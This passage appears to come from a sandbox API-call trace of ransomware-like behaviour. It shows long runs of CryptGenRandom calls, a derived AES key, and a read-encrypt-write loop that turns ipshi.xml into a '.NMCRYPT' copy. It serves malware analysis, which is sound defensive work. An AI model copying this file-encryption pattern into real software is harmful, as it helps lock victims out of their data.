returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.553] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.554] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.555] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.555] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.555] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0147.555] CryptHashData (hHash=0x9ad838, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.555] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad6b8) returned 1 [0147.555] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.555] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.555] wcslen (_String="\\\\?\\") returned 0x4 [0147.555] CryptDuplicateKey (in: hKey=0x9ad6b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad7f8) returned 1 [0147.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.556] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2518) returned 1 [0147.556] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.556] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.557] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.557] GetLastError () returned 0x0 [0147.557] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.568] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.569] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.569] GetLastError () returned 0x0 [0147.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.569] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.569] GetLastError () returned 0x0 [0147.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.569] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.569] GetLastError () returned 0x0 [0147.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.569] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.569] GetLastError () returned 0x0 [0147.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.569] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.569] GetLastError () returned 0x0 [0147.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.569] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.569] GetLastError () returned 0x0 [0147.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.570] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.570] GetLastError () returned 0x0 [0147.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 